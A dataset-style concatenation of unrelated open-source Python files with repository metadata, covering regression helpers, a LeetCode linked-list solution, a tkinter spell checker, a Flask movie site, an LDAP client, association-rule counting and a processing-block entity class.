df: the dataframe of training and test data you want to split.
standardize: if True returns standardized data.
"""
#split the data
train, test = train_test_split(df, train_size=0.8, random_state = 42)
#sort the data
train = train.sort_values(by = ["x1"])
test = test.sort_values(by = ["x1"])
train.describe()
X_train, y_train = train[["x1"]], train["y"]
X_test, y_test = test[["x1"]], test["y"]
X_train_N = add_higher_order_polynomial_terms(X_train, N=15)
X_test_N = add_higher_order_polynomial_terms(X_test, N=15)
if standardize:
scaler = StandardScaler().fit(X_train_N)
X_train_N = scaler.transform(X_train_N)
X_test_N = scaler.transform(X_test_N)
#"X_val" : X_val_N, "y_val" : y_val,
datasets = {"X_train": X_train_N, "y_train": y_train, "X_test" : X_test_N, "y_test": y_test}
return(datasets)
def fit_ridge_and_lasso_cv(X_train, y_train, X_test, y_test,
k = None, alphas = [10**9], best_OLS_r2 = best_least_squares_r2 ): #X_val, y_val,
""" takes in train and validation test sets and reports the best selected model using ridge and lasso regression.
Arguments:
X_train: the train design matrix
y_train: the reponse variable for the training set
X_val: the validation design matrix
y_train: the reponse variable for the validation set
k: the number of k-fold cross validation sections to be fed to Ridge and Lasso Regularization.
"""
# Let us do k-fold cross validation
fitted_ridge = RidgeCV(alphas=alphas, cv = k).fit(X_train, y_train)
fitted_lasso = LassoCV(alphas=alphas, cv = k).fit(X_train, y_train)
print('R^2 score for our original OLS model: {}\n'.format(best_OLS_r2))
ridge_a = fitted_ridge.alpha_
ridge_score = fitted_ridge.score(X_test, y_test)
print('Best alpha for ridge: {}'.format(ridge_a))
print('R^2 score for Ridge with alpha={}: {}\n'.format(ridge_a, ridge_score))
lasso_a = fitted_lasso.alpha_
lasso_score = fitted_lasso.score(X_test, y_test)
print('Best alpha for lasso: {}'.format(lasso_a))
print('R^2 score for Lasso with alpha={}: {}'.format(lasso_a, lasso_score))
r2_df = pd.DataFrame({"OLS": best_OLS_r2, "Lasso" : lasso_score, "Ridge" : ridge_score}, index = [0])
r2_df = r2_df.melt()
r2_df.columns = ["model", "r2_Score"]
plt.title("Validation set")
sns.barplot(x = "model", y = "r2_Score", data = r2_df)
plt.show()
| 40.923077 | 117 | 0.658647 |
43c9b0c4273e8e5eb8ebb7d3ef50508cde1bec57
| 271 |
py
|
Python
|
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | 2 |
2019-10-26T12:47:05.000Z
|
2020-07-07T16:36:19.000Z
|
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | null | null | null |
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | 4 |
2020-02-28T13:43:05.000Z
|
2020-12-02T10:39:46.000Z
|
import os
startpath = 'session15/Tageshoroskope 2020'
os.chdir(startpath)
doclist = []
for i in os.walk('.'):
for d in i[2]:
if d.endswith(".docx"):
n = startpath + i[0].replace('.', '') + '/' + d
doclist.append(n)
print(doclist)
| 19.357143 | 60 | 0.546125 |
7163e59fdf69065377b620e38552d693b8a45bc5
| 2,306 |
py
|
Python
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 1 |
2019-05-22T07:12:34.000Z
|
2019-05-22T07:12:34.000Z
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 3 |
2021-12-10T01:13:54.000Z
|
2021-12-14T21:18:42.000Z
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
# @Time:2020/6/21 17:13
# @Author:TimVan
# @File:21. Merge Two Sorted Lists.py
# @Software:PyCharm
# 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
#
# Example 1:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
#
# Example 2:
# Input: 1->7->10->44->100, 2->3->4
# Output: 1->2->3->4->7->10->44->100
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
# 解法1 正常思路,考虑链表本身
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
p = l1
q = l2
# 带头结点的链表
newListNode = ListNode(0)
m = newListNode
while p and q:
first = p.val
second = q.val
if first <= second:
m.next = ListNode(first)
m = m.next
p = p.next
# 如果p和q相等,也执行
if first >= second:
m.next = ListNode(second)
m = m.next
q = q.next
# 如果p和q还未空,直接拼接
if p is not None:
m.next = ListNode(p.val)
m = m.next
m.next = p.next
elif q is not None:
m.next = ListNode(q.val)
m = m.next
m.next = q.next
return newListNode.next
# 解法2 直接链表相连,使用自定义sort()方法
# 需要类排序,类比较
# 第一组
listNode1 = ListNode(1)
listNode1.next = ListNode(2)
listNode1.next.next = ListNode(4)
listNode2 = ListNode(1)
listNode2.next = ListNode(3)
listNode2.next.next = ListNode(4)
# 第二组
listNode3 = ListNode(1)
listNode3.next = ListNode(7)
listNode3.next.next = ListNode(10)
listNode3.next.next.next = ListNode(44)
listNode3.next.next.next.next = ListNode(100)
listNode4 = ListNode(2)
listNode4.next = ListNode(3)
listNode4.next.next = ListNode(4)
# 第二组
listNode5 = None
listNode6 = ListNode(0)
solution = Solution()
inputArr = [
(listNode1, listNode2),
(listNode3, listNode4),
(listNode5, listNode6)
]
for one in inputArr:
start = solution.mergeTwoLists(one[0], one[1])
print("[", end="")
while start:
print(start.val, end=",")
start = start.next
print("]")
| 24.020833 | 84 | 0.578491 |
e0f3fcc32858a00963d6223a9f9378f8c626cfd3
| 1,075 |
py
|
Python
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 1 |
2020-10-04T12:36:45.000Z
|
2020-10-04T12:36:45.000Z
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 1 |
2021-09-30T16:20:57.000Z
|
2021-09-30T16:20:57.000Z
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 3 |
2020-10-04T10:07:10.000Z
|
2020-10-25T15:21:15.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 28 22:26:53 2020
@author: DELL
"""
from textblob import TextBlob
import tkinter as tk
from tkinter import END
def correction() :
input_word = entry1.get()
blob_obj = TextBlob(input_word)
corrected_word = str(blob_obj.correct())
entry2.insert(10,corrected_word)
def clearAll() :
entry1.delete(0, END)
entry2.delete(0, END)
win=tk.Tk()
win.geometry("400x350")
win.title("Spell Checker")
win.configure(background = 'light cyan')
label1=tk.Label(win,text="Write anything here",font=("times",15,"bold"))
label1.grid(row=1,column=0)
entry1=tk.Entry(win,width=50)
entry1.grid(row=1,column=2)
label2=tk.Label(win,text="Corrected statement",font=("times",15,"bold"))
label2.grid(row=3,column=0)
entry2=tk.Entry(win,width=50)
entry2.grid(row=3,column=2)
b1=tk.Button(win,text="Correct",width=20,command=correction)
b1.grid(row=5,column=0)
b2=tk.Button(win,text="Exit",width=20,command=clearAll)
b2.grid(row=5,column=2)
win.mainloop()
| 26.219512 | 73 | 0.667907 |
1cd15586173a513c0492b613fb150ee7b36e7f70
| 9,939 |
py
|
Python
|
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | 1 |
2019-07-01T07:27:45.000Z
|
2019-07-01T07:27:45.000Z
|
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | null | null | null |
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | null | null | null |
from . import home
from flask import render_template, redirect, url_for, flash, session, request
from app.home.forms import RegisterForm, LoginForm, UserdetailForm, PwdForm, CommentForm
from app.models import User, Userlog, Preview, Tag, Movie, Comment, Moviecol
from werkzeug.security import generate_password_hash
from werkzeug.utils import secure_filename
import uuid
from app import db, app
from functools import wraps
import os
import datetime
# 修改文件名称
def change_filename(filename):
fileinfo = os.path.splitext(filename)
filename = datetime.datetime.now().strftime("%Y%m%d%H%M%S") + str(uuid.uuid4().hex) + fileinfo[-1]
return filename
# 登录装饰器
def user_login_req(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if "user" not in session:
return redirect(url_for("home.login", next=request.url))
return f(*args, **kwargs)
return decorated_function
# 首页
@home.route("/<int:page>",methods=["GET"])
def index(page=None):
tags = Tag.query.all()
page_data = Movie.query
tid = request.args.get("tid",0)
if int(tid) != 0:
page_data = page_data.filter_by(tag_id=int(tid))
star = request.args.get("star", 0)
if int(star) != 0:
page_data = page_data.filter_by(starnum=int(star))
time = request.args.get("time", 0)
if int(time) != 0:
if int(time) == 1:
page_data = page_data.order_by(Movie.addtime.desc())
else:
page_data = page_data.order_by(Movie.addtime.asc())
pm = request.args.get("pm", 0)
if int(pm) != 0:
if int(pm) == 1:
page_data = page_data.order_by(Movie.playnum.desc())
else:
page_data = page_data.order_by(Movie.playnum.asc())
cm = request.args.get("cm", 0)
if int(cm) != 0:
if int(cm) == 1:
page_data = page_data.order_by(Movie.commentnum.desc())
else:
page_data = page_data.order_by(Movie.commentnum.asc())
if page is None:
page = 1
page = request.args.get("page",1)
page_data = page_data.paginate(page=int(page),per_page=10)
p = dict(
tid=tid,
star=star,
time=time,
pm=pm,
cm=cm
)
return render_template("home/index.html",tags=tags,p=p,page_data=page_data)
# 登录
@home.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
data = form.data
user = User.query.filter_by(name=data["name"]).first()
if user:
if not user.check_pwd(data["pwd"]):
flash("密码错误", "err")
return redirect(url_for("home.login"))
else:
flash("账号不存在","err")
return redirect(url_for("home.login"))
session["user"] = user.name
session["user_id"] = user.id
userlog = Userlog(
user_id=user.id,
ip=request.remote_addr
)
db.session.add(userlog)
db.session.commit()
return redirect(url_for("home.user", user=user))
return render_template("home/login.html", form=form)
@home.route("/logout")
def logout():
session.pop("user", None)
session.pop("id", None)
return redirect(url_for("home.login"))
# 注册
@home.route("/register", methods=["GET", "POST"])
def register():
form = RegisterForm()
if form.validate_on_submit():
data = form.data
user = User(
name=data["name"],
email=data["email"],
phone=data["phone"],
pwd=generate_password_hash(data["pwd"]),
uuid=uuid.uuid4().hex
)
db.session.add(user)
db.session.commit()
flash("注册成功", "ok")
return render_template("home/register.html", form=form)
# 会员
@home.route("/user", methods=["GET", "POST"])
@user_login_req
def user():
form = UserdetailForm()
user = User.query.get(int(session["user_id"]))
form.face.validators = []
if request.method == "GET":
# 赋初值
form.name.data = user.name
form.phone.data = user.phone
form.email.data = user.email
form.face.data = user.face
form.info.data = user.info
if form.validate_on_submit():
data = form.data
if form.face.data != "":
file_face = secure_filename(form.face.data.filename)
if not os.path.exists(app.config["FACE_DIR"]):
os.makedirs(app.config["FACE_DIR"])
os.chmod(app.config["FACE_DIR"], "rw")
user.face = change_filename(file_face)
form.face.data.save(app.config["FACE_DIR"] + user.face)
name_count = User.query.filter_by(name=data["name"]).count()
if data["name"] != user.name and name_count == 1:
flash("昵称已存在", "err")
return redirect(url_for("home.user"))
email_count = User.query.filter_by(name=data["email"]).count()
if data["email"] != user.email and email_count == 1:
flash("邮箱已存在", "err")
return redirect(url_for("home.user"))
phone_count = User.query.filter_by(name=data["phone"]).count()
if data["phone"] != user.phone and phone_count == 1:
flash("手机已存在", "err")
return redirect(url_for("home.user"))
user.name = data["name"]
user.email = data["email"]
user.phone = data["phone"]
user.info = data["info"]
db.session.add(user)
db.session.commit()
flash("修改成功", "ok")
return redirect(url_for("home.user"))
return render_template("home/user.html", form=form, user=user)
# 修改密码
@home.route("/pwd", methods=["GET", "POST"])
@user_login_req
def pwd():
form = PwdForm()
if form.validate_on_submit():
data = form.data
user = User.query.get_or_404(int(session["user_id"]))
if not user.check_pwd(data["oldpwd"]):
flash("旧密码错误", "err")
return redirect(url_for('home.pwd'))
user.pwd = generate_password_hash(data["newpwd"])
db.session.add(user)
db.session.commit()
flash("修改密码成功", "ok")
return redirect(url_for('home.pwd'))
return render_template("home/pwd.html", form=form)
# 评论记录
@home.route("/comments/<int:page>",methods=["GET","POST"])
@user_login_req
def comments(page=None):
if page is None:
page = 1
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == Comment.movie_id,
User.id == session["user_id"]
).order_by(
User.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("home/comments.html",page_data=page_data)
# 登录日志
@home.route("/loginlog/<int:page>", methods=["GET", "POST"])
@user_login_req
def loginlog(page=None):
if page is None:
page = 1
page_data = Userlog.query.join(
User
).filter(
User.id == Userlog.user_id
).order_by(
Userlog.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("home/loginlog.html", page_data=page_data)
# 添加电影收藏
@home.route("/moviecol/add",methods=["GET"])
@user_login_req
def moviecol_add():
mid = request.args.get("mid","")
uid = request.args.get("uid", "")
moviecol = Moviecol.query.filter_by(
user_id=int(uid),
movie_id=int(mid)
).count()
if moviecol == 1:
data = dict(ok=0)
if moviecol == 0:
moviecol = Moviecol(
movie_id=int(mid),
user_id=int(uid)
)
db.session.add(moviecol)
db.session.commit()
data = dict(ok=1)
import json
return json.dumps(data)
# 电影收藏
@home.route("/moviecol/<int:page>")
@user_login_req
def moviecol(page=None):
if page is None:
page = 1
page_data = Moviecol.query.join(
Movie
).join(
User
).filter(
Movie.id == Moviecol.movie_id,
User.id == session["user_id"]
).order_by(
Moviecol.addtime.desc()
).paginate(page=page,per_page=10)
return render_template("home/moviecol.html",page_data=page_data)
# 上映预告
@home.route("/animation")
def animation():
data = Preview.query.all()
return render_template("home/animation.html",data=data)
# 搜索
@home.route("/search/<int:page>")
def search(page=None):
if page is None:
page = 1
key = request.args.get("key","")
movie_count = Movie.query.filter(
Movie.title.ilike("%" + key + "%")
).count()
page_data = Movie.query.filter(
Movie.title.ilike("%" + key + "%")
).order_by(
Movie.addtime.desc()
).paginate(page=page,per_page=10)
return render_template("home/search.html",key=key,page_data=page_data,movie_count=movie_count)
# 电影播放
@home.route("/play/<int:id>/<int:page>",methods=["GET","POST"]) # 电影详情页
def play(id=None,page=None):
movie = Movie.query.join(
Tag
).filter(
Tag.id == Movie.tag_id,
Movie.id == int(id)
).first_or_404()
if page is None:
page = 1
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == movie.id,
User.id == Comment.user_id
).order_by(
User.addtime.desc()
).paginate(page=page, per_page=10)
movie.playnum = movie.playnum + 1
form = CommentForm()
if "user" in session and form.validate_on_submit():
data = form.data
comment = Comment(
content = data["content"],
movie_id = movie.id,
user_id = session["user_id"]
)
db.session.add(comment)
db.session.commit()
movie.commentnum = movie.commentnum + 1
db.session.add(movie)
db.session.commit()
flash("添加评论成功","ok")
return redirect(url_for('home.play',id=movie.id,page=1))
db.session.add(movie)
db.session.commit()
return render_template("home/play.html",movie=movie,form=form,page_data=page_data)
| 29.146628 | 102 | 0.594426 |
1cffa8d5ab9c50dc112abe12d918224cb0a87fda
| 20 |
py
|
Python
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 10 |
2020-06-24T08:22:24.000Z
|
2022-01-13T16:17:36.000Z
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 78 |
2020-01-23T14:32:06.000Z
|
2022-03-07T14:11:16.000Z
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 1 |
2020-06-24T08:33:48.000Z
|
2020-06-24T08:33:48.000Z
|
from .Token import *
| 20 | 20 | 0.75 |
e821422bf6c2ed995ada774f11b55a498b04f25b
| 547 |
py
|
Python
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
TRAINING_DATA = [
(
"i went to amsterdem last year and the canals were beautiful",
{"entities": [(10, 19, "TOURIST_DESTINATION")]},
),
(
"You should visit Paris once in your life, but the Eiffel Tower is kinda boring",
{"entities": [(17, 22, "TOURIST_DESTINATION")]},
),
("There's also a Paris in Arkansas, lol", {"entities": []}),
(
"Berlin is perfect for summer holiday: lots of parks, great nightlife, cheap beer!",
{"entities": [(0, 6, "TOURIST_DESTINATION")]},
),
]
| 34.1875 | 92 | 0.581353 |
404627ca2d0da8f17945d99611ee22b401f19e27
| 3,367 |
py
|
Python
|
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import socket
from attr import attrs, attrib
from cached_property import cached_property
from contextlib import suppress
from ldap3 import Connection, Server, NONE, RESTARTABLE
from ldap3.core.exceptions import LDAPCommunicationError
from time import sleep
def auto_retry(fn, max_tries=5, pause=0.1):
""" Retries the decorated function if a LDAP connection error occurs, up
to a given set of retries, using linear backoff.
"""
tried = 0
def retry(self, *args, **kwargs):
nonlocal tried
try:
return fn(self, *args, **kwargs)
except (LDAPCommunicationError, socket.error):
tried += 1
if tried >= max_tries:
raise
sleep(tried * 0.1)
with suppress(ValueError):
self.try_configuration()
return retry(self, *args, **kwargs)
return retry
@attrs()
class LDAPClient():
# The URL of the LDAP server
url: str = attrib()
# The username for the LDAP connection
username: str = attrib()
# The password for the LDAP connection
password: str = attrib()
@property
def base_dn(self):
""" Extracts the distinguished name from the username. """
name = self.username.lower()
if 'dc=' in name:
return 'dc=' + name.split(",dc=", 1)[-1]
return ''
@cached_property
def connection(self):
""" Returns the read-only connection to the LDAP server.
Calling this property is not enough to ensure that the connection is
possible. You should use :meth:`try_configuration` for that.
"""
return Connection(
server=Server(self.url, get_info=NONE),
read_only=True,
auto_bind=False,
client_strategy=RESTARTABLE,
)
def try_configuration(self):
""" Verifies the connection to the LDAP server. """
# disconnect if necessary
with suppress(LDAPCommunicationError, socket.error):
self.connection.unbind()
# clear cache
del self.__dict__['connection']
# reconnect
if not self.connection.rebind(self.username, self.password):
raise ValueError(f"Failed to connect to {self.url}")
@auto_retry
def search(self, query, attributes=()):
""" Runs an LDAP query against the server and returns a dictionary
with the distinguished name as key and the given attributes as values
(also a dict).
"""
self.connection.search(self.base_dn, query, attributes=attributes)
return {
entry.entry_dn: entry.entry_attributes_as_dict
for entry in self.connection.entries
}
@auto_retry
def compare(self, name, attribute, value):
""" Returns true if given user's attribute has the expected value.
:param name:
The distinguished name (DN) of the LDAP user.
:param attribute:
The attribute to query.
:param value:
The value to compare to.
The method returns True if the given value is found on the user.
This is most notably used for password checks. For example::
client.compare('cn=admin', 'userPassword', 'hunter2')
"""
return self.connection.compare(name, attribute, value)
| 26.511811 | 77 | 0.616573 |
907800f3855a155bea90009e468895ee75749e7d
| 795 |
py
|
Python
|
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
import json
class jsonDataReader:
wetness = None
rain = None
temperatur = None
plant1 = None
plant2 = None
plant3 = None
plant4 = None
plant5 = None
timestamp = None
valve = None
def __init__(self):
with open('data.json') as json_file:
data = json.load(json_file)
for p in data['data']:
self.wetness = p['wetness']
self.rain = p['rain']
self.temperatur = p['temperatur']
self.plant1 = p['plant1']
self.plant2 = p['plant2']
self.plant3 = p['plant3']
self.plant4 = p['plant4']
self.plant5 = p['plant5']
self.timestamp = p['timestamp']
self.valve = p['valve']
| 27.413793 | 49 | 0.491824 |
463b8a39a649f587aba557aa336c44e30374f76e
| 1,912 |
py
|
Python
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
'''post process for 310 inference'''
import os
import argparse
import numpy as np
parser = argparse.ArgumentParser(description='post process for cnn')
parser.add_argument("--result_path", type=str, required=True, help="result file path")
parser.add_argument("--label_path", type=str, required=True, help="label file")
args = parser.parse_args()
def cal_acc(result_path, label_path):
img_total = 0
top1_correct = 0
result_shape = (1, 2)
files = os.listdir(result_path)
for file in files:
full_file_path = os.path.join(result_path, file)
if os.path.isfile(full_file_path):
result = np.fromfile(full_file_path, dtype=np.float32).reshape(result_shape)
label_file = os.path.join(label_path, file.split(".bin")[0][:-2] + ".bin")
gt_classes = np.fromfile(label_file, dtype=np.int32)
top1_output = np.argmax(result, (-1))
t1_correct = np.equal(top1_output, gt_classes).sum()
top1_correct += t1_correct
img_total += 1
acc1 = 100.0 * top1_correct / img_total
print('top1_correct={}, total={}, acc={:.2f}%'.format(top1_correct, img_total, acc1))
if __name__ == "__main__":
cal_acc(args.result_path, args.label_path)
| 38.24 | 89 | 0.671025 |
469bb0a49c10f7da0f03f9c61fd0c17edd512333
| 711 |
py
|
Python
|
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | null | null | null |
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | null | null | null |
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | 5 |
2022-02-06T20:05:07.000Z
|
2022-03-10T12:48:58.000Z
|
import math
import numpy as np
import matplotlib.pyplot as plt
def main() -> int:
v_long = 3.0
v_lat = 1.0
print(f"v_long: {v_long}")
print(f"v_lat: {v_lat}")
# since left is negative and right is positive in out coordinate system
a2 = np.arctan2(v_lat * -1.0, v_long)
print(f"arctan2: {a2}")
deg = (a2 / np.pi) * 180.0
if deg < 0.0:
deg = deg + 360.0
print(f"deg: {deg}")
angle = [deg for _ in range(5)]
angle = [math.radians(a) for a in angle]
rs = [i for i in range(5)]
fig, ax = plt.subplots(subplot_kw={'projection': 'polar'})
ax.plot(angle, rs)
ax.grid(True)
plt.show()
return 0
if __name__ == "__main__":
main()
| 20.911765 | 75 | 0.580872 |
d3bd61173aeb330bce7812e3546cea6a4eca711b
| 1,681 |
py
|
Python
|
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
import csv
from collections import Counter
from collections import defaultdict
import os
words_LHS=[]
words_RHS=[]
path=r"C:\Users\Paul\Documents\Studium_PP\Master\Masterarbeit\Gitlab\master-thesis-data-mining\student_work\Code\data\Apriori-Int_0.1"
for file in os.listdir(path):
if file.endswith("_rules.csv"):
with open(os.path.join(path, file), 'r') as csvfile:
reader = csv.reader(csvfile)
next(reader)
next(reader)
for row in reader:
LHS = row[0].replace('{', '').replace('}', '')
csv_words = LHS.split(", ")
for i in csv_words:
words_LHS.append(i)
RHS = row[1].replace('{', '').replace('}', '')
csv_words = RHS.split(", ")
for i in csv_words:
words_RHS.append(i)
words_LHS_counted = []
words_RHS_counted = []
print(len(words_LHS))
print(len(words_RHS))
quit()
for i in words_LHS:
x = words_LHS.count(i)
words_LHS_counted.append((i,x))
for i in words_RHS:
x = words_RHS.count(i)
words_RHS_counted.append((i,x))
# def take_second(elem):
# return elem[1]
items_LHS_counted = sorted(set(words_LHS_counted),reverse=True,key=lambda elem: elem[1])
items_RHS_counted = sorted(set(words_RHS_counted),reverse=True,key=lambda elem: elem[1])
# print(items_counted)
# #write this to csv file
with open('FP-Growth_CountItems0.1.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(['LHS'])
writer.writerows(items_LHS_counted)
writer.writerow(['RHS'])
writer.writerows(items_RHS_counted)
| 31.12963 | 135 | 0.610351 |
315c732f5920febd131d8f75b500eb3bf422c4d9
| 3,006 |
py
|
Python
|
src/config_db/ska_sdp_config/entity/pb.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 2 |
2019-07-15T09:49:34.000Z
|
2019-10-14T16:04:17.000Z
|
src/config_db/ska_sdp_config/entity/pb.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 17 |
2019-07-15T14:51:50.000Z
|
2021-06-02T00:29:43.000Z
|
src/config_db/ska_sdp_config/entity/pb.py
|
ska-telescope/sdp-configuration-prototype
|
8c6cbda04a83b0e16987019406ed6ec7e1058a31
|
[
"BSD-3-Clause"
] | 1 |
2019-10-10T08:16:48.000Z
|
2019-10-10T08:16:48.000Z
|
"""Processing block configuration entities."""
import re
import copy
# Permit identifiers up to 64 bytes in length
_PB_ID_RE = re.compile("^[A-Za-z0-9\\-]{1,64}$")
class ProcessingBlock:
"""Processing block entity.
Collects configuration information relating to a processing job
for the SDP. This might be either real-time (supporting a running
observation) or offline (to process data after the fact).
Actual execution of processing steps will be performed by a
(parametrised) workflow interpreting processing block information.
"""
# pylint: disable=W0102
def __init__(self, pb_id, sbi_id, workflow,
parameters={}, scan_parameters={},
**kwargs):
"""
Create a new processing block structure.
:param pb_id: Processing block ID
:param sbi_id: Scheduling block ID (None if not associated with an SBI)
:param workflow: Workflow description (dictionary for now)
:param parameters: Workflow parameters
:param scan_parameters: Scan parameters (not for batch processing)
:param dct: Dictionary to load from (will ignore other parameters)
:returns: ProcessingBlock object
"""
# Get parameter dictionary
self._dict = {
'pb_id': str(pb_id),
'sbi_id': None if sbi_id is None else str(sbi_id),
'workflow': dict(copy.deepcopy(workflow)),
'parameters': dict(copy.deepcopy(parameters)),
'scan_parameters': dict(copy.deepcopy(scan_parameters))
}
self._dict.update(kwargs)
# Validate
if set(self.workflow) != set(['id', 'type', 'version']):
raise ValueError("Workflow must specify name, type and version!")
if not _PB_ID_RE.match(self.pb_id):
raise ValueError("Processing block ID {} not permissable!".format(
self.pb_id))
def to_dict(self):
"""Return data as dictionary."""
return self._dict
@property
def pb_id(self):
"""Return the Processing Block id."""
return self._dict['pb_id']
@property
def sbi_id(self):
"""Scheduling Block Instance id, if an observation is associated."""
return self._dict.get('sbi_id')
@property
def workflow(self):
"""Information identifying the workflow."""
return self._dict['workflow']
@property
def parameters(self):
"""Workflow-specific parameters."""
